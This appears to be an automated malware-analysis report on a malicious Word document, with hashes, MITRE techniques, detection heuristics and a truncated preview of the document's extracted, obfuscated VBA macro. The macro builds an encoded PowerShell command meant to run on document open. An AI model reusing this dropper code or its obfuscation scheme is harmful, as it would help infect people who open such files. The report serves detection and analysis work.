Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeb52ebb1db95a6c…

MALICIOUS

Office (OLE)

234.5 KB Created: 2018-06-25 09:52:00 Authoring application: Microsoft Office Word First seen: 2018-07-27
MD5: a14d011a9821ee621924b25f4089bdd4 SHA-1: 7103792e005c6ac3358abfdef00b2f19ebe24891 SHA-256: eeb52ebb1db95a6cb4b558e4a7f8c41d674294e85ab847e81b6a056b34baba1b
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute external commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-execution with execution tokens. The ClamAV detection 'Doc.Dropper.Agent-6590363-0' strongly suggests this is a dropper malware.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6590375-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6590375-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13668 bytes
SHA-256: 5d0db7716e00fdb4efc28413f8081f0f23469b9ac88be61d09491aa1977a1cf3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oQzanwYWw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KbuiUkSaopBW"
Function VhiXNiAhBlq()
On Error Resume Next
Ajbadj = (39068 / CBool(73181) + 39209 + CSng(zwwuY) * (58831 - wjWosF + 30324 - CLng(iEmwK)))
swAVoK = CByte(23542 * Tan(89958) / 92809 + CLng(wVNNt * 28451 * 14990 * Chr(98428)))
iSJYbCj = "Hel" + "l  -j" + "oin " + Chr(40) + Chr(40) + "98,49 ," + " 4" + "4 , 1 , " + "123 ,4" + "0 , " + "35 " + ", "
HHzXnI = (50707 / CBool(22934) + 10762 + CSng(fhpJNG) * (96899 - ZkUjDn + 14967 - CLng(WsBbPw)))
DDqtbN = CByte(24987 * Tan(27512) / 96858 + CLng(wQhHL * 99423 * 14898 * Chr(91525)))
zBCUbNHikWj = "49, 107 " + ",41 ,3" + "6 " + ",44 , 35" + " ," + "37 ,50" + " ,102" + ",8 ,3" + "5," + " 50" + ", 104 " + ", 17 , "
iOYaD = (22939 / CBool(29349) + 91977 + CSng(hKiiiu) * (74354 - WMWiM + 42312 - CLng(ZHWak)))
sufzN = CByte(46800 * Tan(57876) / 54412 + CLng(hMRbjo * 54080 * 26329 * Chr(65631)))
okPwpO = "35, 36 " + ",5 ," + "42, 47," + "35 , " + "40 ," + " 50 " + ", 125," + " 98," + "54, 50," + "4,123 , " + "97 , 46," + "50, "
UFcvYj = (43755 / CBool(86304) + 5834 + CSng(wpoLa) * (78663 - zlVWI + 58448 - CLng(iKRkph)))
tooPFQ = CByte(97554 * Tan(12940) / 26839 + CLng(fbbqsX * 11371 * 617 * Chr(83875)))
ziiDhzzplja = "50 , " + "54 ," + " 124," + "105 ," + "105" + ", 37,"
dcNQL = (51383 / CBool(86213) + 32538 + CSng(SlDVC) * (4432 - AvVYR + 85241 - CLng(iqhCt)))
mLkzJU = CByte(33180 * Tan(52123) / 46535 + CLng(fXhsv * 9705 * 53965 * Chr(10898)))
NZXiMzzimtA = "41" + ", 43," + " 54, 52" + " , 35 " + ",39, " + "42 ,43 " + ",104 ," + " 40,3"
oqXJf = (36200 / CBool(13754) + 70664 + CSng(iZiXz) * (58903 - GBFMil + 50947 - CLng(spBjzb)))
ObiEv = CByte(29907 * Tan(2911) / 10073 + CLng(CkLszZ * 14105 * 45141 * Chr(6125)))
iGjtwGEpwK = "5," + " 50" + ",10" + "5 , 49 ," + "41 , " + "52 " + ", " + "34, 5" + "4, 52 " + ", 3"
pDWtq = (6865 / CBool(30966) + 90705 + CSng(pRXkd) * (18641 - CtviL + 9910 - CLng(aKwZid)))
iijim = CByte(41292 * Tan(85234) / 65983 + CLng(AfUjPN * 58412 * 98275 * Chr(65405)))
jwPztHmCYR = "5, 53 , " + "53 ,10" + "5 ,119" + ", 49" + ", 9 ,44" + ", 45 , 4" + "6 ," + "35" + " , 31,"
oWNcUF = (69279 / CBool(14462) + 92400 + CSng(sihSzG) * (75521 - CroRUF + 89552 - CLng(rVjMf)))
rzovUB = CByte(23024 * Tan(55957) / 4196 + CLng(wwvWz * 4456 * 70326 * Chr(17389)))
vPrlCwIKGiw = "3, 126 " + ",105" + ", 6, 46" + ",50" + ", 50, 54" + ",12" + "4,105 " + ", " + "105" + ", 49,49,"
mwquWC = (16695 / CBool(64425) + 32540 + CSng(ObjDt) * (75695 - dDmlfZ + 79907 - CLng(VVJYFp)))
XmsCAF = CByte(33642 * Tan(86676) / 22942 + CLng(vPnmM * 90225 * 4896 * Chr(67345)))
uXdNIdLS = "49 " + ", 104,4" + "7,37 ,36" + ", 104,3" + "7, 42 , " + "105" + " ,28" + ", " + "62,39 , " + "48 ,4"
YhWpH = (45015 / CBool(1409) + 38658 + CSng(hzJLZ) * (57095 - zLqmd + 23587 - CLng(aQkKB)))
IaGpqQ = CByte(7081 * Tan(815) / 94457 + CLng(iAlQLM * 21469 * 68762 * Chr(80754)))
HbEkKoDBwKo = "1,2 , " + "35," + " 1" + "05, 6 " + ",46" + " ,50,5" + "0 ,54 " + ", 124 , " + "105 ,10" + "5 , 49 "
iPjLw = (73917 / CBool(23653) + 44066 + CSng(YWNwjs) * (12986 - UVIaDz + 49208 - CLng(mrvwN)))
AUsEs = CByte(82079 * Tan(91114) / 85948 + CLng(EjDYO * 34159 * 2513 * Chr(8835)))
bZdZTS = ", 49, 49" + " , 1" + "04 , " + "37" + " , 46 , " + "51" + ", 40" + " ," + " 33," + " 37 , 5" + "1, 53 ," + "39"
FUrOh = (69058 / CBool(60043) + 30899 + CSng(zKuQY) * (67325 - WsGbz + 30906 - CLng(bREtzb)))
ulnXt = CByte(86719 * Tan(28167) / 73289 + CLng(IZcjvi * 17620 * 76579 * Chr(16040)))
sfvEXNncf = ",43 ,53 " + ", 41 " + ",52 ," + " 39 " + ", 54,52," + "47,43, 4" + "7 ,35 " + ", "
VhiXNiAhBlq = iSJYbCj + zBCUbNHikWj + okPwpO + ziiDhzzplja + NZXiMzzimtA + iGjtwGEpwK + jwPztHmCYR + vPrlCwIKGiw + uXdNIdLS + HbEkKoDBwKo + bZdZTS + sfvEXNncf
GsYuc = (46637 / CBool(78827) + 45328 + CSng(zdqfo) * (98777 -
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.